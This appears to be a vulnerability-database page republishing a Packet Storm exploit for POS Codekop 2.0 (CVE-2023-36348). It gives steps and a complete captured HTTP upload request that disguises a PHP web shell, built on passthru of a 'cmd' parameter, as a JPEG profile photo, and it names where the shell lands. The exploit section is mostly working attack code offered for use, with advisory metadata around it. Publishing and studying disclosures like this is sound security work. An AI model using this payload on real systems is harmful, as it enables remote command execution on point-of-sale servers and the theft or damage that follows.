Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormYuyudhnPACKETSTORM:173278
HistoryJul 04, 2023 - 12:00 a.m.

POS Codekop 2.0 Shell Upload

2023-07-0400:00:00
yuyudhn
packetstormsecurity.com
73
codekop v2.0
authenticated remote code execution
unsanitized filename
php
file upload
vulnerability
cve-2023-36348
linux
security.

0.003 Low

EPSS

Percentile

69.9%

JSON
`# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)  
# Date: 25-05-2023  
# Exploit Author: yuyudhn  
# Vendor Homepage: https://www.codekop.com/  
# Software Link: https://github.com/fauzan1892/pos-kasir-php  
# Version: 2.0  
# Tested on: Linux  
# CVE: CVE-2023-36348  
# Vulnerability description: The application does not sanitize the filename  
parameter when sending data to /fungsi/edit/edit.php?gambar=user. An  
attacker can exploit this issue by uploading a PHP file and accessing it,  
leading to Remote Code Execution.  
# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/  
  
# Proof of Concept:  
1. Login to POS Codekop dashboard.  
2. Go to profile settings.  
3. Upload PHP script through Upload Profile Photo.  
  
Burp Log Example:  
```  
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1  
Host: localhost  
Content-Length: 8934  
Cache-Control: max-age=0  
sec-ch-ua:  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
**Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-User: ?1**  
Sec-Fetch-Dest: document  
Referer: http://localhost/research/pos-kasir-php/index.php?page=user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv  
Connection: close  
  
------WebKitFormBoundarymVBHqH4m6KgKBnpa  
Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"  
Content-Type: image/jpeg  
  
ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>  
ΓΏΓ›C  
  
-----------------------------  
```  
PHP Web Shell location:  
http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php  
  
`

Related

nvd 1
prion 1
cve 1
zdt 1
cvelist 1
exploitdb 1
nvd
nvd
CVE-2023-36348
2023-06-23 20:15:09
prion
prion
Remote code execution
2023-06-23 20:15:00
cve
cve
CVE-2023-36348
2023-06-23 20:15:09
zdt
zdt
POS Codekop v2.0 - Authenticated Remote Code Execution Vulnerability
2023-07-04 00:00:00
cvelist
cvelist
CVE-2023-36348
2023-06-23 00:00:00
exploitdb
exploitdb
POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
2023-07-03 00:00:00

0.003 Low

EPSS

Percentile

69.9%

JSON
Related for PACKETSTORM:173278
nvd1prion1cve1zdt1cvelist1exploitdb1